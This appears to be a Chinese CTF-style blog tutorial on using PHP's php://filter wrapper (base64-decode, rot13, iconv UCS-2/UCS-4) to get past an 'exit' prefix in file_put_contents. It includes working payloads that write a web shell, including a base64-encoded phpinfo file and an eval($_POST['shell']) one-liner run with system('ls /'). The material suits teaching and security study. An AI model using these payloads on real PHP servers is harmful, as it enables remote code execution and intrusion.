<?phphighlight_file(__FILE__);error_reporting(0);$content = $_POST["content"];file_put_contents($_GET["filename"], "<?php exit; ?>".$content);?>

base64加密

看文章的時候看到這樣的一個代碼，發現我們往文件中寫入的時候，肯定會執行<?php exit;?>，可是這樣就直接退出了就不能執行我們后面的命令，所以我們要想辦法去繞過，或者說不執行這個exit

這道題，可控點有兩個 filename 和 content，先直接給出payload ，然后解析

GET：?filename=php://filter/convert.base64-decode/resource=shell.php

POST：content=PD9waHAgcGhwaW5mbygpOz8+

上面的POST段為<?php phpinfo();?>加密段

看完大佬的文章理解：

base64只對64個字符解密，那如果不是64個字符中的，會直接忽略不計

并且base64中的字符，是要求是4個字節的倍數，如果實在不行則=補齊

隨便輸入一個都是4字節的倍數

<?php exit; ?>這個數據是固定的，而< > ; ?是64以外的字符，解碼時會忽略，我們需要考慮的就是phpexit（空格不需要考慮），因為是4的倍數，如果在最后面系統自動加上=號的話，就改變了我們期望的值，所以需要我們手動進行修改，這時候我們可以在前面隨便添加一個數據，讓它與phpexit組合起來，成為一個亂碼，不會影響后面的執行。

還有一道就是最近遇到的一道題目，和上面的思路差不多

eval("#".$_GET['flag]);

這個#影響了我后面get傳參，不能進行命令執行

所以我的思路也是想如何繞過#，或者刪除了它

可是，當時想了很久都沒有想出來，還是大佬的提醒點了我一下

這既然是php里面的命令，我們完全可以把前面的閉合掉，然后自己再插入一句話木馬

cmd=?><?php eval($_POST['shell']);

shell=system('ls /');進行這樣的操作獲得flag等等，當時腦袋瓦特了想不起來

rot13編碼繞過

rot13編碼的本質就是將字母左移13位。

如：<?php phpinfo();>經過rot13編碼后這樣：<?cuc cucvasb();?>

用在php://filter中的話格式大概為這樣

php://filter/string.rot13/resource=文件名

這樣的話上面的題目，用rot13繞過前面的 exit就會轉成別的東西，而我們輸入的則最后還是那串執行代碼，這樣也就可以繞過了

結果非常清楚，前面exit被認為是加密解密成這樣，后面我們事先加了密，所以抵消，還是原來的

加強繞過exit

<?phphighlight_file(__FILE__);error_reporting(0);$content = $_GET["content"];file_put_contents($content, "<?php exit();".$content);

代碼換成了這樣，好比上面讓你疊飛機下面讓你造飛機（-0-）

顯而易見，只有content這一個傳參點了

這種就是加了一個write直接寫入文件，然后紅色部分/可以換成別的管道符，只要和rot13隔開就行

convert.iconv.

1.usc-2

這個編碼就是2個為一組交換字符的位置（空格也會交換）

為什么我們可以把filter直接寫入，因為寫入以后只有我們輸入的一句話木馬會被執行，別的就相當于亂碼一樣

2.usc-4

就是換成了4個字符一組交換

總結：我們的思路其實都是相同的，通過某一個手段把exit繞過，然后執行我們的命令，其實就是用一些編碼的特性，base64 rot13 usc-2 usc-4，都會把exit變成別的亂碼一般。

到此這篇關于php filter協議使用方法的文章就介紹到這了,更多相關php filter協議內容請搜索以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持！